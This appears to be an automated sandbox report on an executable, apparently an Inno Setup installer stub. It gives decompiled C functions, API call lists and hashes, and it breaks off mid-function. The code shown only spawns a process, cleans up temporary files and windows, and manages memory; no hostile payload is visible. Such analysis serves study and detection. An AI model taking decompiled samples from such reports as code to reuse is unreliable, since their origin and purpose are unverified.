				E004AF728(_t36, _t52, 0x4ba44c,  *((intOrPtr*)(_t73 - 0x3c)), _t71, _t72, __fp0); // executed
				if( *0x4ba448 != 0xffffffff) {
					_t50 =  *0x4ba448; // 0x0
					E004AF60C(_t50);
				}
				_pop(_t68);
				 *[fs:eax] = _t68;
				_push(E004B6554);
				_t39 =  *0x4c1d88; // 0x0
				_t40 = E00405CE8(_t39);
				if( *0x4c1d9c != 0) {
					_t70 =  *0x4c1d9c; // 0x0
					_t40 = E004AF1B4(0, _t70, 0xfa, 0x32); // executed
				}
				if( *0x4c1d94 != 0) {
					_t47 =  *0x4c1d94; // 0x0
					_t40 = RemoveDirectoryW(E004084EC(_t47)); // executed
				}
				if( *0x4ba450 != 0) {
					_t46 =  *0x4ba450; // 0x202b4
					_t40 = DestroyWindow(_t46); // executed
				}
				if( *0x4c1d78 != 0) {
					_t41 =  *0x4c1d78; // 0x0
					_t60 =  *0x4c1d7c; // 0x1
					_t69 =  *0x426bb0; // 0x426bb4
					E00408D08(_t41, _t60, _t69);
					_t43 =  *0x4c1d78; // 0x0
					E0040540C(_t43);
					 *0x4c1d78 = 0;
					return 0;
				}
				return _t40;
			}
























                                                                    0x004b63a1
                                                                    0x004b63a1
                                                                    0x004b63a1
                                                                    0x004b63a1
                                                                    0x004b63a3
                                                                    0x004b63a6
                                                                    0x004b63d3
                                                                    0x004b63da
                                                                    0x004b63e0
                                                                    0x004b6407
                                                                    0x004b640c
                                                                    0x004b6418
                                                                    0x004b6423
                                                                    0x004b642c
                                                                    0x004b6431
                                                                    0x004b6434
                                                                    0x004b6438
                                                                    0x004b643d
                                                                    0x004b6440
                                                                    0x004b6443
                                                                    0x004b6447
                                                                    0x004b644c
                                                                    0x004b644f
                                                                    0x004b6452
                                                                    0x004b6463
                                                                    0x004b6468
                                                                    0x004b646b
                                                                    0x004b6471
                                                                    0x004b6479
                                                                    0x004b647e
                                                                    0x004b6489
                                                                    0x004b6496
                                                                    0x004b649b
                                                                    0x004b64a7
                                                                    0x004b64a9
                                                                    0x004b64ae
                                                                    0x004b64ae
                                                                    0x004b64b5
                                                                    0x004b64b8
                                                                    0x004b64bb
                                                                    0x004b64c0
                                                                    0x004b64c5
                                                                    0x004b64d1
                                                                    0x004b64df
                                                                    0x004b64e7
                                                                    0x004b64e7
                                                                    0x004b64f3
                                                                    0x004b64f5
                                                                    0x004b6500
                                                                    0x004b6500
                                                                    0x004b650c
                                                                    0x004b650e
                                                                    0x004b6514
                                                                    0x004b6514
                                                                    0x004b6520
                                                                    0x004b6522
                                                                    0x004b6527
                                                                    0x004b652d
                                                                    0x004b6533
                                                                    0x004b6538
                                                                    0x004b653d
                                                                    0x004b6544
                                                                    0x00000000
                                                                    0x004b6544
                                                                    0x004b6549

                                                                    APIs
                                                                      • Part of subcall function 0040E450: CreateWindowExW.USER32 ref: 0040E48F
                                                                    • SetWindowLongW.USER32 ref: 004B641E
                                                                      • Part of subcall function 00422BC4: GetCommandLineW.KERNEL32(00000000,00422C06,?,?,00000000,?,004B647E,004B6680,?), ref: 00422BDA
                                                                      • Part of subcall function 004AF728: CreateProcessW.KERNEL32 ref: 004AF798
                                                                      • Part of subcall function 004AF728: CloseHandle.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,004AF82C,00000000,004AF81C,00000000), ref: 004AF7AE
                                                                      • Part of subcall function 004AF728: MsgWaitForMultipleObjects.USER32 ref: 004AF7C7
                                                                      • Part of subcall function 004AF728: GetExitCodeProcess.KERNEL32 ref: 004AF7DB
                                                                      • Part of subcall function 004AF728: CloseHandle.KERNEL32(?,?,004BA44C,00000001,?,00000000,000000FF,000004FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004AF7E4
                                                                    • RemoveDirectoryW.KERNEL32(00000000,004B6554), ref: 004B6500
                                                                    • DestroyWindow.USER32(000202B4,004B6554), ref: 004B6514
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.319564629.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000009.00000002.319540262.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319752753.00000000004B7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319806928.00000000004C0000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319842191.00000000004C4000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319861378.00000000004C6000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Window$CloseCreateHandleProcess$CodeCommandDestroyDirectoryExitLineLongMultipleObjectsRemoveWait
                                                                    • String ID: /SL5="$%x,%d,%d,$InnoSetupLdrWindow$STATIC$|gO
                                                                    • API String ID: 3586484885-1461680330
                                                                    • Opcode ID: 3c021837c984efc67f9ad3a794955b0d04b23bc85077f6812c73bb0a86195aee
                                                                    • Instruction ID: 04c90e22d0408fd8de4b79ff2beaee59f7a3a861a1d73b16261182ae62401715
                                                                    • Opcode Fuzzy Hash: 3c021837c984efc67f9ad3a794955b0d04b23bc85077f6812c73bb0a86195aee
                                                                    • Instruction Fuzzy Hash: EC416B74A002009FE754EBA9EC85B9A37B4EB85308F11453BE0059B2B6CB7CA851CB5D
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0040426C, Relevance: 12.2, APIs: 8, Instructions: 221sleepCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 91%
                                                                    			E0040426C(void* __eax, signed int __edi, void* __ebp) {
				struct _MEMORY_BASIC_INFORMATION _v44;
				void* _v48;
				signed int __ebx;
				void* _t58;
				signed int _t61;
				int _t65;
				signed int _t67;
				void _t70;
				int _t71;
				signed int _t78;
				void* _t79;
				signed int _t81;
				intOrPtr _t82;
				signed int _t87;
				signed int _t88;
				signed int _t89;
				signed int _t92;
				void* _t96;
				signed int _t99;
				void* _t103;
				intOrPtr _t104;
				void* _t106;
				void* _t108;
				signed int _t113;
				void* _t115;
				void* _t116;

				_t56 = __eax;
				_t89 =  *(__eax - 4);
				_t78 =  *0x4bb059; // 0x0
				if((_t89 & 0x00000007) != 0) {
					__eflags = _t89 & 0x00000005;
					if((_t89 & 0x00000005) != 0) {
						_pop(_t78);
						__eflags = _t89 & 0x00000003;
						if((_t89 & 0x00000003) == 0) {
							_push(_t78);
							_push(__edi);
							_t116 = _t115 + 0xffffffdc;
							_t103 = __eax - 0x10;
							E00403C48();
							_t58 = _t103;
							 *_t116 =  *_t58;
							_v48 =  *((intOrPtr*)(_t58 + 4));
							_t92 =  *(_t58 + 0xc);
							if((_t92 & 0x00000008) != 0) {
								_t79 = _t103;
								_t113 = _t92 & 0xfffffff0;
								_t99 = 0;
								__eflags = 0;
								while(1) {
									VirtualQuery(_t79,  &_v44, 0x1c);
									_t61 = VirtualFree(_t79, 0, 0x8000);
									__eflags = _t61;
									if(_t61 == 0) {
										_t99 = _t99 | 0xffffffff;
										goto L10;
									}
									_t104 = _v44.RegionSize;
									__eflags = _t113 - _t104;
									if(_t113 > _t104) {
										_t113 = _t113 - _t104;
										_t79 = _t79 + _t104;
										continue;
									}
									goto L10;
								}
							} else {
								_t65 = VirtualFree(_t103, 0, 0x8000); // executed
								if(_t65 == 0) {
									_t99 = __edi | 0xffffffff;
								} else {
									_t99 = 0;
								}
							}
							L10:
							if(_t99 == 0) {
								 *_v48 =  *_t116;
								 *( *_t116 + 4) = _v48;
							}
							 *0x4bdb78 = 0;
							return _t99;
						} else {
							return 0xffffffff;
						}
					} else {
						goto L31;
					}
				} else {
					__eflags = __bl;
					__ebx =  *__edx;
					if(__eflags != 0) {
						while(1) {
							__eax = 0x100;
							asm("lock cmpxchg [ebx], ah");
							if(__eflags == 0) {
								goto L14;
							}
							asm("pause");
							__eflags =  *0x4bb989;
							if(__eflags != 0) {
								continue;
							} else {
								Sleep(0);
								__edx = __edx;
								__ecx = __ecx;
								__eax = 0x100;
								asm("lock cmpxchg [ebx], ah");
								if(__eflags != 0) {
									Sleep(0xa);
									__edx = __edx;
									__ecx = __ecx;
									continue;
								}
							}
							goto L14;
						}
					}
					L14:
					_t14 = __edx + 0x14;
					 *_t14 =  *(__edx + 0x14) - 1;
					__eflags =  *_t14;
					__eax =  *(__edx + 0x10);
					if( *_t14 == 0) {
						__eflags = __eax;
						if(__eax == 0) {
							L20:
							 *(__ebx + 0x14) = __eax;
						} else {
							__eax =  *(__edx + 0xc);
							__ecx =  *(__edx + 8);
							 *(__eax + 8) = __ecx;
							 *(__ecx + 0xc) = __eax;
							__eax = 0;
							__eflags =  *((intOrPtr*)(__ebx + 0x18)) - __edx;
							if( *((intOrPtr*)(__ebx + 0x18)) == __edx) {
								goto L20;
							}
						}
						 *__ebx = __al;
						__eax = __edx;
						__edx =  *(__edx - 4);
						__bl =  *0x4bb059; // 0x0
						L31:
						__eflags = _t78;
						_t81 = _t89 & 0xfffffff0;
						_push(_t101);
						_t106 = _t56;
						if(__eflags != 0) {
							while(1) {
								_t67 = 0x100;
								asm("lock cmpxchg [0x4bbae8], ah");
								if(__eflags == 0) {
									goto L32;
								}
								asm("pause");
								__eflags =  *0x4bb989;
								if(__eflags != 0) {
									continue;
								} else {
									Sleep(0);
									_t67 = 0x100;
									asm("lock cmpxchg [0x4bbae8], ah");
									if(__eflags != 0) {
										Sleep(0xa);
										continue;
									}
								}
								goto L32;
							}
						}
						L32:
						__eflags = (_t106 - 4)[_t81] & 0x00000001;
						_t87 = (_t106 - 4)[_t81];
						if(((_t106 - 4)[_t81] & 0x00000001) != 0) {
							_t67 = _t81 + _t106;
							_t88 = _t87 & 0xfffffff0;
							_t81 = _t81 + _t88;
							__eflags = _t88 - 0xb30;
							if(_t88 >= 0xb30) {
								_t67 = E00403AC0(_t67);
							}
						} else {
							_t88 = _t87 | 0x00000008;
							__eflags = _t88;
							(_t106 - 4)[_t81] = _t88;
						}
						__eflags =  *(_t106 - 4) & 0x00000008;
						if(( *(_t106 - 4) & 0x00000008) != 0) {
							_t88 =  *(_t106 - 8);
							_t106 = _t106 - _t88;
							_t81 = _t81 + _t88;
							__eflags = _t88 - 0xb30;
							if(_t88 >= 0xb30) {
								_t67 = E00403AC0(_t106);
							}
						}
						__eflags = _t81 - 0x13ffe0;
						if(_t81 == 0x13ffe0) {
							__eflags =  *0x4bbaf0 - 0x13ffe0;
							if( *0x4bbaf0 != 0x13ffe0) {
								_t82 = _t106 + 0x13ffe0;
								E00403B60(_t67);
								 *((intOrPtr*)(_t82 - 4)) = 2;
								 *0x4bbaf0 = 0x13ffe0;
								 *0x4bbaec = _t82;
								 *0x4bbae8 = 0;
								__eflags = 0;
								return 0;
							} else {
								_t108 = _t106 - 0x10;
								_t70 =  *_t108;
								_t96 =  *(_t108 + 4);
								 *(_t70 + 4) = _t96;
								 *_t96 = _t70;
								 *0x4bbae8 = 0;
								_t71 = VirtualFree(_t108, 0, 0x8000);
								__eflags = _t71 - 1;
								asm("sbb eax, eax");
								return _t71;
							}
						} else {
							 *(_t106 - 4) = _t81 + 3;
							 *(_t106 - 8 + _t81) = _t81;
							E00403B00(_t106, _t88, _t81);
							 *0x4bbae8 = 0;
							__eflags = 0;
							return 0;
						}
					} else {
						__eflags = __eax;
						 *(__edx + 0x10) = __ecx;
						 *(__ecx - 4) = __eax;
						if(__eflags == 0) {
							__ecx =  *(__ebx + 8);
							 *(__edx + 0xc) = __ebx;
							 *(__edx + 8) = __ecx;
							 *(__ecx + 0xc) = __edx;
							 *(__ebx + 8) = __edx;
							 *__ebx = 0;
							__eax = 0;
							__eflags = 0;
							_pop(__ebx);
							return 0;
						} else {
							__eax = 0;
							__eflags = 0;
							 *__ebx = __al;
							_pop(__ebx);
							return 0;
						}
					}
				}
			}





























                                                                    0x0040426c
                                                                    0x0040426c
                                                                    0x00404275
                                                                    0x0040427b
                                                                    0x00404364
                                                                    0x00404367
                                                                    0x00404454
                                                                    0x00404455
                                                                    0x00404458
                                                                    0x00403cf8
                                                                    0x00403cfa
                                                                    0x00403cfc
                                                                    0x00403d01
                                                                    0x00403d04
                                                                    0x00403d09
                                                                    0x00403d0d
                                                                    0x00403d13
                                                                    0x00403d17
                                                                    0x00403d1d
                                                                    0x00403d39
                                                                    0x00403d3d
                                                                    0x00403d40
                                                                    0x00403d40
                                                                    0x00403d42
                                                                    0x00403d4a
                                                                    0x00403d57
                                                                    0x00403d5c
                                                                    0x00403d5e
                                                                    0x00403d60
                                                                    0x00403d63
                                                                    0x00403d63
                                                                    0x00403d65
                                                                    0x00403d69
                                                                    0x00403d6b
                                                                    0x00403d6d
                                                                    0x00403d6f
                                                                    0x00000000
                                                                    0x00403d6f
                                                                    0x00000000
                                                                    0x00403d6b
                                                                    0x00403d1f
                                                                    0x00403d27
                                                                    0x00403d2e
                                                                    0x00403d34
                                                                    0x00403d30
                                                                    0x00403d30
                                                                    0x00403d30
                                                                    0x00403d2e
                                                                    0x00403d73
                                                                    0x00403d75
                                                                    0x00403d7e
                                                                    0x00403d87
                                                                    0x00403d87
                                                                    0x00403d8a
                                                                    0x00403d9a
                                                                    0x0040445e
                                                                    0x00404463
                                                                    0x00404463
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00404281
                                                                    0x00404281
                                                                    0x00404283
                                                                    0x00404285
                                                                    0x004042e8
                                                                    0x004042e8
                                                                    0x004042ed
                                                                    0x004042f1
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004042f3
                                                                    0x004042f5
                                                                    0x004042fc
                                                                    0x00000000
                                                                    0x004042fe
                                                                    0x00404302
                                                                    0x00404307
                                                                    0x00404308
                                                                    0x00404309
                                                                    0x0040430e
                                                                    0x00404312
                                                                    0x0040431c
                                                                    0x00404321
                                                                    0x00404322
                                                                    0x00000000
                                                                    0x00404322
                                                                    0x00404312
                                                                    0x00000000
                                                                    0x004042fc
                                                                    0x004042e8
                                                                    0x00404287
                                                                    0x00404287
                                                                    0x00404287
                                                                    0x00404287
                                                                    0x0040428b
                                                                    0x0040428e
                                                                    0x004042bc
                                                                    0x004042be
                                                                    0x004042d3
                                                                    0x004042d3
                                                                    0x004042c0
                                                                    0x004042c0
                                                                    0x004042c3
                                                                    0x004042c6
                                                                    0x004042c9
                                                                    0x004042cc
                                                                    0x004042ce
                                                                    0x004042d1
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004042d1
                                                                    0x004042d6
                                                                    0x004042d8
                                                                    0x004042da
                                                                    0x004042dd
                                                                    0x0040436d
                                                                    0x00404370
                                                                    0x00404372
                                                                    0x00404374
                                                                    0x00404375
                                                                    0x00404377
                                                                    0x00404328
                                                                    0x00404328
                                                                    0x0040432d
                                                                    0x00404335
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00404337
                                                                    0x00404339
                                                                    0x00404340
                                                                    0x00000000
                                                                    0x00404342
                                                                    0x00404344
                                                                    0x00404349
                                                                    0x0040434e
                                                                    0x00404356
                                                                    0x0040435a
                                                                    0x00000000
                                                                    0x0040435a
                                                                    0x00404356
                                                                    0x00000000
                                                                    0x00404340
                                                                    0x00404328
                                                                    0x00404379
                                                                    0x00404379
                                                                    0x00404381
                                                                    0x00404385
                                                                    0x004043bc
                                                                    0x004043bf
                                                                    0x004043c2
                                                                    0x004043c4
                                                                    0x004043ca
                                                                    0x004043cc
                                                                    0x004043cc
                                                                    0x00404387
                                                                    0x00404387
                                                                    0x00404387
                                                                    0x0040438a
                                                                    0x0040438a
                                                                    0x0040438e
                                                                    0x00404392
                                                                    0x004043d4
                                                                    0x004043d7
                                                                    0x004043d9
                                                                    0x004043db
                                                                    0x004043e1
                                                                    0x004043e5
                                                                    0x004043e5
                                                                    0x004043e1
                                                                    0x00404394
                                                                    0x0040439a
                                                                    0x004043ec
                                                                    0x004043f6
                                                                    0x00404424
                                                                    0x0040442a
                                                                    0x0040442f
                                                                    0x00404436
                                                                    0x00404440
                                                                    0x00404446
                                                                    0x0040444d
                                                                    0x00404451
                                                                    0x004043f8
                                                                    0x004043f8
                                                                    0x004043fb
                                                                    0x004043fd
                                                                    0x00404400
                                                                    0x00404403
                                                                    0x00404405
                                                                    0x00404414
                                                                    0x00404419
                                                                    0x0040441c
                                                                    0x00404420
                                                                    0x00404420
                                                                    0x0040439c
                                                                    0x0040439f
                                                                    0x004043a2
                                                                    0x004043aa
                                                                    0x004043af
                                                                    0x004043b6
                                                                    0x004043ba
                                                                    0x004043ba
                                                                    0x00404290
                                                                    0x00404290
                                                                    0x00404292
                                                                    0x00404298
                                                                    0x0040429b
                                                                    0x004042a4
                                                                    0x004042a7
                                                                    0x004042aa
                                                                    0x004042ad
                                                                    0x004042b0
                                                                    0x004042b3
                                                                    0x004042b6
                                                                    0x004042b6
                                                                    0x004042b8
                                                                    0x004042b9
                                                                    0x0040429d
                                                                    0x0040429d
                                                                    0x0040429d
                                                                    0x0040429f
                                                                    0x004042a1
                                                                    0x004042a2
                                                                    0x004042a2
                                                                    0x0040429b
                                                                    0x0040428e

                                                                    APIs
                                                                    • Sleep.KERNEL32(00000000,?,?,00000000,0040BB40,0040BBA6,?,00000000,?,?,0040BEC9,00000000,?,00000000,0040C3CA,00000000), ref: 00404302
                                                                    • Sleep.KERNEL32(0000000A,00000000,?,?,00000000,0040BB40,0040BBA6,?,00000000,?,?,0040BEC9,00000000,?,00000000,0040C3CA), ref: 0040431C
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.319564629.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000009.00000002.319540262.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319752753.00000000004B7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319806928.00000000004C0000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319842191.00000000004C4000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319861378.00000000004C6000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Sleep
                                                                    • String ID:
                                                                    • API String ID: 3472027048-0
                                                                    • Opcode ID: bb44cecb062a42ab294f9ebbddb74143d6ecf503913ace061e42b720e5e9e313
                                                                    • Instruction ID: daf3465a9571387f72e828d046180f4ce70f3b260d456b91f151aa63c4646fa2
                                                                    • Opcode Fuzzy Hash: bb44cecb062a42ab294f9ebbddb74143d6ecf503913ace061e42b720e5e9e313
                                                                    • Instruction Fuzzy Hash: AA71E2B17042008BD715DF29CC84B16BBD8AF85715F2482BFE984AB3D2D7B899418789
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004B60E8, Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 165windowCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 75%
                                                                    			E004B60E8(void* __ebx, void* __edi, void* __esi, void* __fp0) {
				intOrPtr _t26;
				intOrPtr _t31;
				intOrPtr _t37;
				intOrPtr _t38;
				intOrPtr _t42;
				intOrPtr _t44;
				intOrPtr _t47;
				intOrPtr _t51;
				intOrPtr _t53;
				intOrPtr _t55;
				intOrPtr _t56;
				intOrPtr _t59;
				intOrPtr _t61;
				WCHAR* _t63;
				intOrPtr _t69;
				intOrPtr _t74;
				int _t75;
				intOrPtr _t76;
				intOrPtr _t78;
				struct HWND__* _t81;
				intOrPtr _t82;
				intOrPtr _t86;
				void* _t90;
				intOrPtr _t93;
				intOrPtr _t99;
				intOrPtr _t101;
				intOrPtr _t107;
				intOrPtr _t114;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr _t117;
				void* _t120;
				intOrPtr _t121;

				_t119 = __esi;
				_t118 = __edi;
				_t85 = __ebx;
				_pop(_t101);
				_pop(_t88);
				 *[fs:eax] = _t101;
				E004AF678(_t88);
				if( *0x4ba440 == 0) {
					if(( *0x4c1d71 & 0x00000001) == 0 &&  *0x4ba441 == 0) {
						_t61 =  *0x4ba674; // 0x4c0d0c
						_t4 = _t61 + 0x2f8; // 0x0
						_t63 = E004084EC( *_t4);
						_t88 = _t120 - 0x28;
						_t101 =  *0x4c1c48; // 0x0
						E00426F08(0xc2, _t120 - 0x28, _t101);
						if(MessageBoxW(0, E004084EC( *((intOrPtr*)(_t120 - 0x28))), _t63, 0x24) != 6) {
							 *0x4ba44c = 2;
							E0041F238();
						}
					}
					E004056D0();
					E004AEFE8(_t120 - 0x2c, _t85, _t101, _t118, _t119); // executed
					E00407E00(0x4c1d94,  *((intOrPtr*)(_t120 - 0x2c)));
					_t26 =  *0x4c1d84; // 0x0
					E00422954(_t26, _t88, _t120 - 0x34);
					E004226C8( *((intOrPtr*)(_t120 - 0x34)), _t85, _t120 - 0x30, L".tmp", _t118, _t119);
					_push( *((intOrPtr*)(_t120 - 0x30)));
					_t31 =  *0x4c1d94; // 0x0
					E00422660(_t31, _t120 - 0x38);
					_pop(_t90);
					E0040873C(0x4c1d98, _t90,  *((intOrPtr*)(_t120 - 0x38)));
					_t107 =  *0x4c1d98; // 0x0
					E00407E00(0x4c1d9c, _t107);
					_t37 =  *0x4c1d90; // 0x4f677c
					_t15 = _t37 + 0x14; // 0x4cbe4a
					_t38 =  *0x4c1d88; // 0x0
					E00423CE8(_t38,  *_t15);
					_push(_t120);
					_push(0x4b63ab);
					_push( *[fs:edx]);
					 *[fs:edx] = _t121;
					 *0x4c1de0 = 0;
					_t42 = E00423D00(1, 0, 1, 0); // executed
					 *0x4c1d8c = _t42;
					_push(_t120);
					_push(0x4b639a);
					_push( *[fs:eax]);
					 *[fs:eax] = _t121;
					_t44 =  *0x4c1d90; // 0x4f677c
					_t16 = _t44 + 0x18; // 0x323c00
					 *0x4c1de0 = E004053F0( *_t16);
					_t47 =  *0x4c1d90; // 0x4f677c
					_t17 = _t47 + 0x18; // 0x323c00
					_t86 =  *0x4c1de0; // 0x7fb80010
					E00405884(_t86,  *_t17);
					_push(_t120);
					_push(0x4b62e9);
					_push( *[fs:eax]);
					 *[fs:eax] = _t121;
					_t51 =  *0x424cd8; // 0x424d30
					_t93 =  *0x4c1d88; // 0x0
					_t53 = E00424748(_t93, 1, _t51); // executed
					 *0x4c1de4 = _t53;
					_push(_t120);
					_push(0x4b62d8);
					_push( *[fs:eax]);
					 *[fs:eax] = _t121;
					_t55 =  *0x4c1d90; // 0x4f677c
					_t18 = _t55 + 0x18; // 0x323c00
					_t56 =  *0x4c1de4; // 0x21269d0
					E00424A24(_t56,  *_t18, _t86);
					_pop(_t114);
					 *[fs:eax] = _t114;
					_push(E004B62DF);
					_t59 =  *0x4c1de4; // 0x21269d0
					return E00405CE8(_t59);
				} else {
					_t69 =  *0x4ba674; // 0x4c0d0c
					_t1 = _t69 + 0x1d0; // 0x0
					E004AFA44( *_t1, __ebx, __edi, __esi);
					 *0x4ba44c = 0;
					_pop(_t115);
					 *[fs:eax] = _t115;
					_push(E004B6554);
					_t74 =  *0x4c1d88; // 0x0
					_t75 = E00405CE8(_t74);
					if( *0x4c1d9c != 0) {
						_t117 =  *0x4c1d9c; // 0x0
						_t75 = E004AF1B4(0, _t117, 0xfa, 0x32); // executed
					}
					if( *0x4c1d94 != 0) {
						_t82 =  *0x4c1d94; // 0x0
						_t75 = RemoveDirectoryW(E004084EC(_t82)); // executed
					}
					if( *0x4ba450 != 0) {
						_t81 =  *0x4ba450; // 0x202b4
						_t75 = DestroyWindow(_t81); // executed
					}
					if( *0x4c1d78 != 0) {
						_t76 =  *0x4c1d78; // 0x0
						_t99 =  *0x4c1d7c; // 0x1
						_t116 =  *0x426bb0; // 0x426bb4
						E00408D08(_t76, _t99, _t116);
						_t78 =  *0x4c1d78; // 0x0
						E0040540C(_t78);
						 *0x4c1d78 = 0;
						return 0;
					}
					return _t75;
				}
			}




































                                                                    0x004b60e8
                                                                    0x004b60e8
                                                                    0x004b60e8
                                                                    0x004b60ea
                                                                    0x004b60ec
                                                                    0x004b60ed
                                                                    0x004b610d
                                                                    0x004b6119
                                                                    0x004b613e
                                                                    0x004b614b
                                                                    0x004b6150
                                                                    0x004b6156
                                                                    0x004b615c
                                                                    0x004b615f
                                                                    0x004b6169
                                                                    0x004b6181
                                                                    0x004b6183
                                                                    0x004b618d
                                                                    0x004b618d
                                                                    0x004b6181
                                                                    0x004b6192
                                                                    0x004b619a
                                                                    0x004b61a7
                                                                    0x004b61af
                                                                    0x004b61b4
                                                                    0x004b61c4
                                                                    0x004b61cc
                                                                    0x004b61d0
                                                                    0x004b61d5
                                                                    0x004b61e2
                                                                    0x004b61e3
                                                                    0x004b61ed
                                                                    0x004b61f3
                                                                    0x004b61f8
                                                                    0x004b61fd
                                                                    0x004b6200
                                                                    0x004b6205
                                                                    0x004b620c
                                                                    0x004b620d
                                                                    0x004b6212
                                                                    0x004b6215
                                                                    0x004b621a
                                                                    0x004b6232
                                                                    0x004b6237
                                                                    0x004b623e
                                                                    0x004b623f
                                                                    0x004b6244
                                                                    0x004b6247
                                                                    0x004b624a
                                                                    0x004b624f
                                                                    0x004b6257
                                                                    0x004b625c
                                                                    0x004b6261
                                                                    0x004b6264
                                                                    0x004b626e
                                                                    0x004b6275
                                                                    0x004b6276
                                                                    0x004b627b
                                                                    0x004b627e
                                                                    0x004b6281
                                                                    0x004b6287
                                                                    0x004b6294
                                                                    0x004b6299
                                                                    0x004b62a0
                                                                    0x004b62a1
                                                                    0x004b62a6
                                                                    0x004b62a9
                                                                    0x004b62ac
                                                                    0x004b62b1
                                                                    0x004b62b6
                                                                    0x004b62bb
                                                                    0x004b62c2
                                                                    0x004b62c5
                                                                    0x004b62c8
                                                                    0x004b62cd
                                                                    0x004b62d7
                                                                    0x004b611b
                                                                    0x004b611b
                                                                    0x004b6120
                                                                    0x004b6126
                                                                    0x004b612d
                                                                    0x004b64b5
                                                                    0x004b64b8
                                                                    0x004b64bb
                                                                    0x004b64c0
                                                                    0x004b64c5
                                                                    0x004b64d1
                                                                    0x004b64df
                                                                    0x004b64e7
                                                                    0x004b64e7
                                                                    0x004b64f3
                                                                    0x004b64f5
                                                                    0x004b6500
                                                                    0x004b6500
                                                                    0x004b650c
                                                                    0x004b650e
                                                                    0x004b6514
                                                                    0x004b6514
                                                                    0x004b6520
                                                                    0x004b6522
                                                                    0x004b6527
                                                                    0x004b652d
                                                                    0x004b6533
                                                                    0x004b6538
                                                                    0x004b653d
                                                                    0x004b6544
                                                                    0x00000000
                                                                    0x004b6544
                                                                    0x004b6549
                                                                    0x004b6549

                                                                    APIs
                                                                    • MessageBoxW.USER32(00000000,00000000,00000000,00000024), ref: 004B6179
                                                                      • Part of subcall function 004AFA44: MessageBoxW.USER32(00000000,00000000,Setup,00000010), ref: 004AFAAE
                                                                    • RemoveDirectoryW.KERNEL32(00000000,004B6554), ref: 004B6500
                                                                    • DestroyWindow.USER32(000202B4,004B6554), ref: 004B6514
                                                                      • Part of subcall function 004AF1B4: Sleep.KERNEL32(?,?,?,?,0000000D,?,004B64EC,000000FA,00000032,004B6554), ref: 004AF1D3
                                                                      • Part of subcall function 004AF1B4: GetLastError.KERNEL32(?,?,?,0000000D,?,004B64EC,000000FA,00000032,004B6554), ref: 004AF1F6
                                                                      • Part of subcall function 004AF1B4: GetLastError.KERNEL32(?,?,?,0000000D,?,004B64EC,000000FA,00000032,004B6554), ref: 004AF200
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.319564629.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000009.00000002.319540262.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319752753.00000000004B7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319806928.00000000004C0000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319842191.00000000004C4000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319861378.00000000004C6000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: ErrorLastMessage$DestroyDirectoryRemoveSleepWindow
                                                                    • String ID: .tmp$0MB$|gO
                                                                    • API String ID: 3858953238-3931795636
                                                                    • Opcode ID: 930ec171da33bb7cb26a68baf49ed61eca7e6ecce176de484762bd5e64518e8e
                                                                    • Instruction ID: b159488041d1577a8b45ed1a1d18f26c00613076fc9a683522f38ff229f2206a
                                                                    • Opcode Fuzzy Hash: 930ec171da33bb7cb26a68baf49ed61eca7e6ecce176de484762bd5e64518e8e
                                                                    • Instruction Fuzzy Hash: AC615A342002009FD755EF69ED86EAA37A5EB4A308F51453AF801976B2DA3CBC51CB6D
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004AF728, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 77processCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 61%
                                                                    			E004AF728(void* __eax, void* __ebx, DWORD* __ecx, void* __edx, void* __edi, void* __esi, void* __fp0) {
				char _v8;
				struct _STARTUPINFOW _v76;
				void* _v88;
				void* _v92;
				int _t23;
				intOrPtr _t49;
				DWORD* _t51;
				void* _t56;

				_v8 = 0;
				_t51 = __ecx;
				_t53 = __edx;
				_t41 = __eax;
				_push(_t56);
				_push(0x4af7ff);
				_push( *[fs:eax]);
				 *[fs:eax] = _t56 + 0xffffffa8;
				_push(0x4af81c);
				_push(__eax);
				_push(0x4af82c);
				_push(__edx);
				E004087C4( &_v8, __eax, 4, __ecx, __edx);
				E00405884( &_v76, 0x44);
				_v76.cb = 0x44;
				_t23 = CreateProcessW(0, E004084EC(_v8), 0, 0, 0, 0, 0, 0,  &_v76,  &_v92); // executed
				_t58 = _t23;
